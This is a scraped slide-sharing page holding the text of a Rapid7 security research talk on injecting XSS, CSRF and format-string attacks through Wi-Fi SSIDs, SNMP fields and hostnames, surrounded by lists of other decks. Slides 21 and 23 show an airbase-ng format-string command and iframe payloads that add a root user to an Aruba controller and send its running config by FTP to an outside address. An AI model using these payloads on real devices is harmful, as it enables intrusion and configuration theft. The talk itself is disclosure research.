Are your cloud servers under attack?– Hacker Halted 2019 – Brian HilemanAre your cloud servers under attack?– Hacker Halted 2019 – Brian Hileman
Are your cloud servers under attack?– Hacker Halted 2019 – Brian Hileman
 
War Game: Ransomware – Global CISO Forum 2019
War Game: Ransomware – Global CISO Forum 2019War Game: Ransomware – Global CISO Forum 2019
War Game: Ransomware – Global CISO Forum 2019
 
How to become a Security Behavior Alchemist – Global CISO Forum 2019 – Perry ...
How to become a Security Behavior Alchemist – Global CISO Forum 2019 – Perry ...How to become a Security Behavior Alchemist – Global CISO Forum 2019 – Perry ...
How to become a Security Behavior Alchemist – Global CISO Forum 2019 – Perry ...
 
Introduction to FAIR Risk Methodology – Global CISO Forum 2019 – Donna Gall...
Introduction to FAIR Risk Methodology – Global CISO Forum 2019  –  Donna Gall...Introduction to FAIR Risk Methodology – Global CISO Forum 2019  –  Donna Gall...
Introduction to FAIR Risk Methodology – Global CISO Forum 2019 – Donna Gall...
 
Alexa is a snitch! Hacker Halted 2019 - Wes Widner
Alexa is a snitch! Hacker Halted 2019 - Wes WidnerAlexa is a snitch! Hacker Halted 2019 - Wes Widner
Alexa is a snitch! Hacker Halted 2019 - Wes Widner
 
Hacker Halted 2018: Don't Panic! Big Data Analytics vs. Law Enforcement
Hacker Halted 2018: Don't Panic! Big Data Analytics vs. Law EnforcementHacker Halted 2018: Don't Panic! Big Data Analytics vs. Law Enforcement
Hacker Halted 2018: Don't Panic! Big Data Analytics vs. Law Enforcement
 
Hacker Halted 2018: HACKING TRILLIAN: A 42-STEP SOLUTION TO EXPLOIT POST-VOGA...
Hacker Halted 2018: HACKING TRILLIAN: A 42-STEP SOLUTION TO EXPLOIT POST-VOGA...Hacker Halted 2018: HACKING TRILLIAN: A 42-STEP SOLUTION TO EXPLOIT POST-VOGA...
Hacker Halted 2018: HACKING TRILLIAN: A 42-STEP SOLUTION TO EXPLOIT POST-VOGA...
 
Hacker Halted 2018: Breaking the Bad News: How to Prevent Your IR Messages fr...
Hacker Halted 2018: Breaking the Bad News: How to Prevent Your IR Messages fr...Hacker Halted 2018: Breaking the Bad News: How to Prevent Your IR Messages fr...
Hacker Halted 2018: Breaking the Bad News: How to Prevent Your IR Messages fr...
 
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
 
Hacker Halted 2018: SE vs Predator: Using Social Engineering in ways I never ...
Hacker Halted 2018: SE vs Predator: Using Social Engineering in ways I never ...Hacker Halted 2018: SE vs Predator: Using Social Engineering in ways I never ...
Hacker Halted 2018: SE vs Predator: Using Social Engineering in ways I never ...
 

Recently uploaded

Biomedical Knowledge Graphs for Data Scientists and Bioinformaticians
Biomedical Knowledge Graphs for Data Scientists and BioinformaticiansBiomedical Knowledge Graphs for Data Scientists and Bioinformaticians
Biomedical Knowledge Graphs for Data Scientists and Bioinformaticians
Neo4j
 
5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides
DanBrown980551
 
Skybuffer SAM4U tool for SAP license adoption
Skybuffer SAM4U tool for SAP license adoptionSkybuffer SAM4U tool for SAP license adoption
Skybuffer SAM4U tool for SAP license adoption
Tatiana Kojar
 
JavaLand 2024: Application Development Green Masterplan
JavaLand 2024: Application Development Green MasterplanJavaLand 2024: Application Development Green Masterplan
JavaLand 2024: Application Development Green Masterplan
Miro Wengner
 
Monitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdfMonitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdf
Tosin Akinosho
 
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
Jason Yip
 
Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024
Jason Packer
 
Your One-Stop Shop for Python Success: Top 10 US Python Development Providers
Your One-Stop Shop for Python Success: Top 10 US Python Development ProvidersYour One-Stop Shop for Python Success: Top 10 US Python Development Providers
Your One-Stop Shop for Python Success: Top 10 US Python Development Providers
akankshawande
 
Generating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and MilvusGenerating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and Milvus
Zilliz
 
What is an RPA CoE? Session 1 – CoE Vision
What is an RPA CoE?  Session 1 – CoE VisionWhat is an RPA CoE?  Session 1 – CoE Vision
What is an RPA CoE? Session 1 – CoE Vision
DianaGray10
 
Nordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptxNordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptx
MichaelKnudsen27
 
Dandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity serverDandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity server
Antonios Katsarakis
 
Driving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success StoryDriving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success Story
Safe Software
 
Introduction of Cybersecurity with OSS at Code Europe 2024
Introduction of Cybersecurity with OSS  at Code Europe 2024Introduction of Cybersecurity with OSS  at Code Europe 2024
Introduction of Cybersecurity with OSS at Code Europe 2024
Hiroshi SHIBATA
 
“How Axelera AI Uses Digital Compute-in-memory to Deliver Fast and Energy-eff...
“How Axelera AI Uses Digital Compute-in-memory to Deliver Fast and Energy-eff...“How Axelera AI Uses Digital Compute-in-memory to Deliver Fast and Energy-eff...
“How Axelera AI Uses Digital Compute-in-memory to Deliver Fast and Energy-eff...
Edge AI and Vision Alliance
 
The Microsoft 365 Migration Tutorial For Beginner.pptx
The Microsoft 365 Migration Tutorial For Beginner.pptxThe Microsoft 365 Migration Tutorial For Beginner.pptx
The Microsoft 365 Migration Tutorial For Beginner.pptx
operationspcvita
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
panagenda
 
Digital Banking in the Cloud: How Citizens Bank Unlocked Their Mainframe
Digital Banking in the Cloud: How Citizens Bank Unlocked Their MainframeDigital Banking in the Cloud: How Citizens Bank Unlocked Their Mainframe
Digital Banking in the Cloud: How Citizens Bank Unlocked Their Mainframe
Precisely
 
Essentials of Automations: Exploring Attributes & Automation Parameters
Essentials of Automations: Exploring Attributes & Automation ParametersEssentials of Automations: Exploring Attributes & Automation Parameters
Essentials of Automations: Exploring Attributes & Automation Parameters
Safe Software
 

Recently uploaded (20)

Biomedical Knowledge Graphs for Data Scientists and Bioinformaticians
Biomedical Knowledge Graphs for Data Scientists and BioinformaticiansBiomedical Knowledge Graphs for Data Scientists and Bioinformaticians
Biomedical Knowledge Graphs for Data Scientists and Bioinformaticians
 
5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides
 
Skybuffer SAM4U tool for SAP license adoption
Skybuffer SAM4U tool for SAP license adoptionSkybuffer SAM4U tool for SAP license adoption
Skybuffer SAM4U tool for SAP license adoption
 
JavaLand 2024: Application Development Green Masterplan
JavaLand 2024: Application Development Green MasterplanJavaLand 2024: Application Development Green Masterplan
JavaLand 2024: Application Development Green Masterplan
 
Monitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdfMonitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdf
 
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
 
Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024
 
Your One-Stop Shop for Python Success: Top 10 US Python Development Providers
Your One-Stop Shop for Python Success: Top 10 US Python Development ProvidersYour One-Stop Shop for Python Success: Top 10 US Python Development Providers
Your One-Stop Shop for Python Success: Top 10 US Python Development Providers
 
Generating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and MilvusGenerating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and Milvus
 
What is an RPA CoE? Session 1 – CoE Vision
What is an RPA CoE?  Session 1 – CoE VisionWhat is an RPA CoE?  Session 1 – CoE Vision
What is an RPA CoE? Session 1 – CoE Vision
 
Nordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptxNordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptx
 
Dandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity serverDandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity server
 
Driving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success StoryDriving Business Innovation: Latest Generative AI Advancements & Success Story
Driving Business Innovation: Latest Generative AI Advancements & Success Story
 
Artificial Intelligence and Electronic Warfare
Artificial Intelligence and Electronic WarfareArtificial Intelligence and Electronic Warfare
Artificial Intelligence and Electronic Warfare
 
Introduction of Cybersecurity with OSS at Code Europe 2024
Introduction of Cybersecurity with OSS  at Code Europe 2024Introduction of Cybersecurity with OSS  at Code Europe 2024
Introduction of Cybersecurity with OSS at Code Europe 2024
 
“How Axelera AI Uses Digital Compute-in-memory to Deliver Fast and Energy-eff...
“How Axelera AI Uses Digital Compute-in-memory to Deliver Fast and Energy-eff...“How Axelera AI Uses Digital Compute-in-memory to Deliver Fast and Energy-eff...
“How Axelera AI Uses Digital Compute-in-memory to Deliver Fast and Energy-eff...
 
The Microsoft 365 Migration Tutorial For Beginner.pptx
The Microsoft 365 Migration Tutorial For Beginner.pptxThe Microsoft 365 Migration Tutorial For Beginner.pptx
The Microsoft 365 Migration Tutorial For Beginner.pptx
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
 
Digital Banking in the Cloud: How Citizens Bank Unlocked Their Mainframe
Digital Banking in the Cloud: How Citizens Bank Unlocked Their MainframeDigital Banking in the Cloud: How Citizens Bank Unlocked Their Mainframe
Digital Banking in the Cloud: How Citizens Bank Unlocked Their Mainframe
 
Essentials of Automations: Exploring Attributes & Automation Parameters
Essentials of Automations: Exploring Attributes & Automation ParametersEssentials of Automations: Exploring Attributes & Automation Parameters
Essentials of Automations: Exploring Attributes & Automation Parameters
 

It’s All In The Name - Deral Heiland

  • 1. It’s All In The Name
  • 2. Introduction Deral Heiland Rapid7 Research Lead “IoT” •  25+ years of experience in the Information Technology, 15 of that in Security and last 8+ year security researcher, penetration tester and consulting for corporations and government agencies deral_heiland@rapid7.com @Percent_X
  • 3. Agenda •  Why •  Web technology •  Web security and lack there of •  Injection attack using commonly overlooked methods •  A few examples •  Conclusion •  Questions
  • 4. Why •  Search for simple and obvious attacks vectors •  Machine to machine exchange of data •  The simple is so often overlooked
  • 5. Web Technology •  Embedded •  Appliance •  IoT •  Management software •  Network •  Security •  Device (printers)
  • 6. Acme.Serve/v1.7 of 13nov96 ACS 5.5 Allegro-Software-RomPager/1.52 Allegro-Software-RomPager/ 2.10 Allegro-Software-RomPager/4.10 Allegro-Software-RomPager/4.34 Apache Apache/2.2.15 (CentOS) Apache/2.2.15 (Red Hat) Apache/2.2.17 (Unix) Apache/2.2.29 (Unix) Apache/2.2.31 (FreeBSD)A Apache/2.2.3 (CentOS) Apache/2.4.12 (Unix) Apache-Coyote/1.1 AvigilonOnvifNvt/2.2.0.14 AvigilonOnvifNvt/2.6.0.4 Avocent DSView 3/3.7.1.27 Brivo ACS OnSite Cherokee/1.2.101 (UNIX) Cougar/9.6.7100.0 DVRDVS-Webs EWS-NIC4/11.68 GoAhead-Webs gSOAP/2.8 Happy ICS Server Hiawatha v5.7 HP-ChaiServer/3.0 HP-ChaiSOE/1.0 HP_Compact_Server HTTP/1.0 HTTP/1.1 IBM_HTTP_Server IBM_HTTP_SERVER/1.3.28 Apache/1.3.28 (Win32) Jetty/5.1.10 (Linux/2.6.11gum arm java/1.3.1 subset Jetty/5.1.10 (Linux/2.6.21gum arm java/1.4.2 subset Jetty(6.1.5) Jetty(8.y.z-SNAPSHOT) Jetty(9.1.1.v20140108) Jetty(9.1.5.v20140505) Jetty(9.2.z-SNAPSHOT) lighttpd/1.4.11 lighttpd/1.4.13 lighttpd/1.4.23-devel-2760 lighttpd/1.4.23-devel-3200 lighttpd/1.4.25-devel-7739 lighttpd/1.4.32 lighttpd/1.4.35 Linux/3.0.1+, UPnP/1.0 Mbedthis-Appweb/2.4.2 Microplex emHTTPD/1.0 Microsoft-HTTPAPI/2.0 Microsoft-IIS/10.0 Microsoft-IIS/6.0 Microsoft-IIS/7.0 Microsoft-IIS/7.5 Microsoft-IIS/8.0 Microsoft-IIS/8.5 Microsoft-WinCE/7.00 Mono.WebServer2/0.4.0.0 Win32NT nginx/1.2.3 nginx/1.4.6 (Ubuntu) Niagara Web Server/3.5.34 Niagara Web Server/3.7.106.12 PanWeb Server/ - PasteWSGIServer/0.5 Python/2.6.6 RapidLogic/1.1 SecureTransport 5.3.1 thttpd/2.25b ulwsd/1.0.1-20140331 Virata-EmWeb/R6_0_1 Virata-EmWeb/R6_2_1 Wireless IP Telephone HTTPd Web Technology
  • 7. •  XSS allows Malicious actors to inject client-side scripts into web pages viewed by other users. •  Reflective •  Persistent •  CSRF causes a user's web browser to perform an unwanted action. •  Alter configurations •  Complete a transaction (IE Banking) Web security and The lack there of !
  • 8. •  Format String A format string is an ansi C specifier that is supplied to a function to tell the program what the format of the output should be. •  Format String Vulnerability Incorrectly written code that does not define the format string specifiers. Allowing format strings to be passed within an applications variable, which leads to the application evaluating the input as code. Web security and The lack there of !
  • 9. •  Filtering input •  Escaping dangerous characters •  Use CSRF tokens •  Conduct regular code reviews Web security and The lack there of !
  • 10. •  Directly targeting web app •  Internet exposed app still often discovered with issues •  Good AppSec program can help mitigate •  Application firewalls can help mitigate Internet exposure •  Off the shelf products and embedded devices still have issues Web security and The lack there of !
  • 12. Exploit Delivery •  Machine to Machine •  Very often overlooked •  Great for targeting enterprise •  Enterprise management solutions •  Embedded devices
  • 13. SSID
  • 14. SSID •  Service Set Identifier (SSID) •  Purpose of the SSID is to assign human readable names to an 802.11 wireless network •  The SSID is broadcast in a management frame or Beacon Frame
  • 15. SSID information element •  Element ID: This is set to ‘0’ to signal that an SSID is being broadcast •  Length: Indicates the length of the information field •  SSID: The human readable station name
  • 16. SSID •  No defined restrictions as to what characters can be used within an SSID (IEEE Std 802.11™-2012) •  Limited to 32 characters
  • 17. SSID •  Not the first time this attack vector was reported •  Rafael Dominguez Vega of MWR InfoSecurity •  White paper: Behind Enemy Lines July 2008 •  BT Home Hub •  DD-WRT •  My research expanded on this and targeted more enterprise level solutions
  • 18. SSID •  This research work initial disclosed in 2013 Blackhat Europe •  Multiple vulnerable products •  Wifi Pineapple •  Cisco small business Wifi Wap200 and Wep200 •  SonicWall network security appliance •  Aruba Wireless LAN Controllers •  Since then •  Unnamed Wifi Lan Controller •  Enterprise IoT automation solution ( Not Released Yet)
  • 19. SSID •  Attack vectors identified deliverable via SSID •  XSS •  CSRF •  Format string
  • 20. SSID •  Format String Injection •  Cisco/Linksys WAP200 & WET200 •  Site Survey function: Listens for all APs within range and reports back their SSID
  • 21. SSID •  Setup airbase-ng to broadcast SSID “%x%x%x” airbase-ng -e “%x%x%x" -c 2 mon0 •  AP survey detected %x%x%x SSID
  • 23. SSID •  Aruba commands executed using <IFRAME> <iframe src=/screens/auth/execAddUser.html? username=hacker&passwd=Hack3d&role=root&status=> <iframe src=/screens/cmnutil/execCommandReturnResult.xml?copy %20running-config%20ftp%20192.168.1.14%20%22anonymous %22%20%22test%22%20%22running.cfg%22%20%22/incoming %22@@1357225152747>
  • 24. SNMP ISO (1) ORG (3) DOD (6) INTERNET (1) Directory (1) Management (2) Experimental (3) Private (4)
  • 25. SNMP •  Management Information Base (MIB) is a file that contains definitions of management information so that networked systems can be remotely monitored, configured, and controlled. •  Object Identifier (OIDs) point to individual network objects that are maintained within a database called a Management Information Base
  • 26. SNMP •  The OIDs that are the most critical include: •  1.3.6.1.2.1.1.1.0 sysDesc •  1.3.6.1.2.1.1.4.0 sysContact •  1.3.6.1.2.1.1.5.0 sysName •  1.3.6.1.2.1.1.6.0 sysLocation
  • 27. SNMP •  Injection attacks via SNMP data •  Research project started in Fall 2015 •  Deral Heiland Matthew Kienow •  Mainly targeting Network Management Systems •  Currently 6 published products advisories •  5 more to be released prior to Defcon Conference
  • 30. Hostname •  What application and appliances consume hostname? •  What is the impact? •  Do they properly filter and escape data from hostname?
  • 31. •  CVE-2015-3626, (XSS) vulnerability in the DHCP Monitor page in the Web User Interface (WebUI) in Fortinet FortiOS before 5.2.4 on FortiGate devices allows remote attackers to inject arbitrary web script or HTML via a crafted hostname •  CVE-2014-4645 •  CVE-2014-4727 •  CVE-2013-3572 Hostname
  • 32. Hostname •  I am still collecting data on this •  Made a request several months back online •  https://community.rapid7.com/community/infosec/blog/ 2016/03/09/it-s-all-in-the-name •  Check out blog and participate security@rapid7.com (PGP KeyID: 0x8AD4DB8D)
  • 33. Questions Deral Heiland Rapid7 Research Lead “IoT” Deral_Heiland@rapid7.com @Percent_x